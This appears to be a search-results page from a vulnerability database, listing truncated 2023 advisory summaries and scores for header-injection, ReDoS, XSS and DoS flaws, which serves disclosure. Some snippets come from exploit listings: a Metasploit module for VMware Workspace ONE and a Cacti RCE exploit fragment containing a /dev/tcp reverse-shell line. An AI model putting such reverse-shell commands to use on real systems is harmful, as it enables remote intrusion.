Lucene search
K

1634 matches found

Github Security Blog
Github Security Blog
added 2023/04/24 10:42 p.m.48 views

HTTP Multiline Header Termination

Impact Affected versions of Laminas Diactoros accepted a single line feed LF / \n character at the end of a header name. When serializing such a header name containing a line-feed into the on-the-wire representation of a HTTP/1.x message, the resulting message would be syntactically invalid, due ...

7.5CVSS6AI score0.00965EPSS
Exploits0References6Affected Software1
OSV
OSV
added 2023/04/24 10:42 p.m.49 views

GHSA-XV3H-4844-9H36 HTTP Multiline Header Termination

Impact Affected versions of Laminas Diactoros accepted a single line feed LF / \n character at the end of a header name. When serializing such a header name containing a line-feed into the on-the-wire representation of a HTTP/1.x message, the resulting message would be syntactically invalid, due ...

7.5CVSS6.2AI score0.00965EPSS
Exploits0References6
OSV
OSV
added 2023/04/18 10:20 p.m.39 views

GHSA-Q2QJ-628G-VHFW Insecure header validation in slim/psr7

Impact An attacker could sneak in a newline \n into both the header names and values. While the specification states that \r\n\r\n is used to terminate the header list, many servers in the wild will also accept \n\n. An attacker that is able to control the header names that are passed to Slilm-Ps...

6.5CVSS6.1AI score0.00743EPSS
Exploits0References9
Packet Storm
Packet Storm
added 2023/04/18 12:0 a.m.403 views

Mware Workspace ONE Remote Code Execution

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'VMware Workspace ONE Access VMSA-2022-0011 exploit chain', 'Description' = %q This module combines two vulnerabilities in order achieve remote co...

9.8CVSS8.4AI score0.50694EPSS
Exploits12
UbuntuCve
UbuntuCve
added 2023/04/17 10:15 p.m.34 views

CVE-2023-30536

slim/psr7 is a PSR-7 implementation for use with Slim 4. In versions prior to 1.6.1 an attacker could sneak in a newline \n into both the header names and values. While the specification states that \r\n\r\n is used to terminate the header list, many servers in the wild will also accept \n\n. An...

6.5CVSS6.7AI score0.00743EPSS
Exploits0References5
Debian CVE
Debian CVE
added 2023/04/17 9:17 p.m.21 views

CVE-2023-30536

slim/psr7 is a PSR-7 implementation for use with Slim 4. In versions prior to 1.6.1 an attacker could sneak in a newline \n into both the header names and values. While the specification states that \r\n\r\n is used to terminate the header list, many servers in the wild will also accept \n\n. An...

6.5CVSS6.7AI score0.00743EPSS
Exploits0
OSV
OSV
added 2023/04/17 9:17 p.m.21 views

CVE-2023-30536 Insecure header validation in slim/psr7

slim/psr7 is a PSR-7 implementation for use with Slim 4. In versions prior to 1.6.1 an attacker could sneak in a newline \n into both the header names and values. While the specification states that \r\n\r\n is used to terminate the header list, many servers in the wild will also accept \n\n. An...

6.5CVSS6.7AI score0.00743EPSS
Exploits0References5
Laminas
Laminas
added 2023/04/17 5:0 p.m.47 views

HTTP Multiline Header Termination Vulnerability

The package laminas/laminas-diactoros Diactoros is a PSR-7 HTTP Message and PSR-17 HTTP Message Factory implementation, providing HTTP request and response message representations both for making HTTP client requests and responding to HTTP requests server-side. Affected versions of Diactoros...

7.5CVSS6.9AI score0.00965EPSS
Exploits0References4Affected Software1
0day.today
0day.today
added 2023/04/08 12:0 a.m.197 views

Lucee Scheduled Job v1.0 - Command Execution Exploit

Exploit Title: Lucee Scheduled Job v1.0 - Command Execution Exploit Author: Alexander Philiotis Vendor Homepage: https://www.lucee.org/ Software Link: https://download.lucee.org/ Version: All versions with scheduled jobs enabled Tested on: Linux - Debian, Lubuntu & Windows 10 Ref :...

6.8AI score
Exploits0
0day.today
0day.today
added 2023/03/31 12:0 a.m.265 views

Cacti v1.2.22 - Remote Command Execution Exploit

Exploit Title: Cacti v1.2.22 - Remote Command Execution RCE Exploit Author: Riadh BOUCHAHOUA Vendor Homepage: https://www.cacti.net/ Software Links : https://github.com/Cacti/cacti Tested Version: 1.2.2x /dev/tcp/self.rshost/self.rsport &1'" import base64 b64revshell =...

9.8CVSS9.4AI score0.99826EPSS
Exploits48
Vulnrichment
Vulnrichment
added 2023/03/23 12:0 a.m.7 views

CVE-2023-20067 Cisco IOS XE Software for Wireless LAN Controllers HTTP Client Profiling Denial of Service Vulnerability

A vulnerability in the HTTP-based client profiling feature of Cisco IOS XE Software for Wireless LAN Controllers WLCs could allow an unauthenticated, adjacent attacker to cause a denial of service DoS condition on an affected device. This vulnerability is due to insufficient input validation of...

7.4CVSS7.2AI score0.00303EPSS
Exploits0References1
Cvelist
Cvelist
added 2023/03/23 12:0 a.m.27 views

CVE-2023-20067 Cisco IOS XE Software for Wireless LAN Controllers HTTP Client Profiling Denial of Service Vulnerability

A vulnerability in the HTTP-based client profiling feature of Cisco IOS XE Software for Wireless LAN Controllers WLCs could allow an unauthenticated, adjacent attacker to cause a denial of service DoS condition on an affected device. This vulnerability is due to insufficient input validation of...

7.4CVSS7.5AI score0.00303EPSS
Exploits0References1
ATTACKERKB
ATTACKERKB
added 2023/03/22 11:0 p.m.2 views

CVE-2023-20067

A vulnerability in the HTTP-based client profiling feature of Cisco IOS XE Software for Wireless LAN Controllers WLCs could allow an unauthenticated, adjacent attacker to cause a denial of service DoS condition on an affected device. This vulnerability is due to insufficient input validation of...

7.4CVSS6.6AI score0.00303EPSS
Exploits0References2
Cvelist
Cvelist
added 2023/03/17 7:4 p.m.34 views

CVE-2023-27592 Stored XSS in Miniflux when opening a broken image due to unescaped ServerError in proxy handler

Miniflux is a feed reader. Since v2.0.25, Miniflux will automatically proxy images served over HTTP to prevent mixed content errors. When an outbound request made by the Go HTTP client fails, the html.ServerError is returned unescaped without the expected Content Security Policy header added to...

4.8CVSS6.1AI score0.00586EPSS
Exploits0References7
AlpineLinux
AlpineLinux
added 2023/03/17 7:4 p.m.88 views

CVE-2023-27592

Miniflux is a feed reader. Since v2.0.25, Miniflux will automatically proxy images served over HTTP to prevent mixed content errors. When an outbound request made by the Go HTTP client fails, the html.ServerError is returned unescaped without the expected Content Security Policy header added to...

5.4CVSS5.7AI score0.00586EPSS
Exploits0
RedhatCVE
RedhatCVE
added 2023/02/21 4:29 p.m.22 views

CVE-2023-24807

Undici is an HTTP/1.1 client for Node.js. Prior to version 5.19.1, the Headers.set and Headers.append methods are vulnerable to Regular Expression Denial of Service ReDoS attacks when untrusted values are passed into the functions. This is due to the inefficient regular expression used to normali...

7.5CVSS7.5AI score0.01304EPSS
Exploits0References3
SUSE CVE
SUSE CVE
added 2023/02/18 2:21 a.m.3 views

SUSE CVE-2023-24807

Undici is an HTTP/1.1 client for Node.js. Prior to version 5.19.1, the Headers.set and Headers.append methods are vulnerable to Regular Expression Denial of Service ReDoS attacks when untrusted values are passed into the functions. This is due to the inefficient regular expression used to normali...

7.5CVSS8AI score0.01304EPSS
Exploits0References10
Vulnrichment
Vulnrichment
added 2023/02/16 5:30 p.m.5 views

CVE-2023-24807 Undici vulnerable to Regular Expression Denial of Service in Headers

Undici is an HTTP/1.1 client for Node.js. Prior to version 5.19.1, the Headers.set and Headers.append methods are vulnerable to Regular Expression Denial of Service ReDoS attacks when untrusted values are passed into the functions. This is due to the inefficient regular expression used to normali...

7.5CVSS7.8AI score0.01304EPSS
Exploits0References4
CVE
CVE
added 2023/02/16 5:30 p.m.320 views

CVE-2023-24807

The CVE-2023-24807 issue is in Undici’s header normalization (headerValueNormalize) used by the Headers.fetch API, allowing a Regular Expression Denial of Service when untrusted header values are processed. Affected range is before Undici v5.19.1; the vulnerability is fixed in v5.19.1. Upgrading ...

7.5CVSS7.9AI score0.01304EPSS
Exploits0References5Affected Software1
SUSE CVE
SUSE CVE
added 2023/02/15 5:53 a.m.4 views

SUSE CVE-2011-1498

Apache HttpClient 4.x before 4.1.1 in Apache HttpComponents, when used with an authenticating proxy server, sends the Proxy-Authorization header to the origin server, which allows remote web servers to obtain sensitive information by logging this header...

4.3CVSS7.1AI score0.06685EPSS
Exploits0References3
Rows per page
Query Builder